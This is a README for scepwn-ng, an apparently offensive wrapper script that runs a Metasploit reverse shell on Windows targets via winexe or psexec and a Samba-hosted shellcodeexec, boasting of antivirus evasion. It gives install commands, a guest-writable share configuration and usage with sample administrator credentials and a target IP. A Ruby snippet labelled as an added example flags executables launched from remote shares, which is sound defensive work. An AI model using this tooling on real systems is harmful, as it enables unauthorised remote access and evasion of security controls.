A winexe/psexec wrapper to use sce and a msfvenom generated payload on a target system

scepwn-ng @thejosko jskorich@secureworks.com

INTRODUCTION

scepwn-ng is a wrapper script that launches winexe or psexec against a target, which then runs shellcodeexec from a Samba share with a Metasploit-generated reverse shell. Because the executable never touches disk, it is highly effective at evading antivirus.
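
Seen from the defending side, the execution path described above produces a process whose image is an executable on a remote share rather than a local file. The following Ruby code is an added example, not part of scepwn-ng: it flags such records, assuming process-creation telemetry that records the image as a UNC path; the record layout, host names, file names and allowlist are constructed.

```ruby
# Added example: flag process-creation records whose image was started from a
# UNC path on a host outside an allowlist. All records below are constructed.

# \\host\share\path\file.exe, captured as named groups.
UNC_EXE = %r{\A\\\\(?<host>[^\\]+)\\(?<share>[^\\]+)\\(?<file>.+\.exe)\z}i
IP_LITERAL = /\A\d{1,3}(\.\d{1,3}){3}\z/

# Hypothetical allowlist of servers that legitimately host executables.
TRUSTED_HOSTS = %w[fileserver01.corp.example].freeze

# Constructed sample records; the field names are an assumed, simplified layout.
SAMPLE_EVENTS = [
  { time: '2024-01-01T10:00:00Z', computer: 'WS01',
    image: 'C:\\Windows\\System32\\notepad.exe' },
  { time: '2024-01-01T10:02:11Z', computer: 'WS01',
    image: '\\\\fileserver01.corp.example\\apps\\setup.exe' },
  { time: '2024-01-01T10:05:42Z', computer: 'WS02',
    image: '\\\\10.1.1.50\\sce_share\\loader.exe' },
  { time: '2024-01-01T10:09:03Z', computer: 'WS03',
    image: '\\\\BUILD-BOX\\tmp\\tool.exe' }
].freeze

# Returns one finding per record whose image is an .exe on an untrusted UNC host.
# A share addressed by raw IP is rated higher, since managed shares are
# normally reached by name (a heuristic, tune it for your environment).
def unc_executions(events, trusted: TRUSTED_HOSTS)
  events.each_with_object([]) do |ev, findings|
    m = UNC_EXE.match(ev[:image].to_s)
    next unless m
    next if trusted.include?(m[:host].downcase)

    findings << {
      time: ev[:time], computer: ev[:computer],
      share_host: m[:host], share: m[:share], file: m[:file],
      severity: m[:host].match?(IP_LITERAL) ? :high : :medium
    }
  end
end

if __FILE__ == $PROGRAM_NAME
  unc_executions(SAMPLE_EVENTS).each do |f|
    puts "#{f[:time]} #{f[:computer]} #{f[:severity]} \\\\#{f[:share_host]}\\#{f[:share]}\\#{f[:file]}"
  end
end
```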

INSTALL

Basic setup for a Kali box (skyfire):

		$ cd /opt
		$ git clone https://github.com/CoreSecurity/impacket.git
		$ cd impacket; python setup.py install
		$ cd /opt; git clone https://github.com/inquisb/shellcodeexec.git

If you are not using Kali, you will also need to install Metasploit and winexe, and manually set up the Samba share:

Add a share to your Samba configuration, usually located at /etc/samba/smb.conf:

	[sce_share]
		browseable = no
		path = /var/sce_share
		guest ok = yes
		read only = no
		create mask = 0600
		directory mask = 0700

USAGE

	./scepwn-ng.rb [optional]

Example:

	./scepwn-ng.rb -u 'Administrator%Password1' -t 10.1.1.1 -s psexec -p 4444

Note: all options are just that, optional. If you leave anything out, the script will prompt you for it.

Options:

	-t, --target TARGET              Target IP address
	-u, --user CREDENTIALS           Credentials in DOMAIN/USERNAME%PASSWORD format
	-p, --port PORT                  Reverse shell port number (default: 443)
	-s, --service SERVICE            winexe or psexec (default: winexe)
	-h, --help                       Display this screen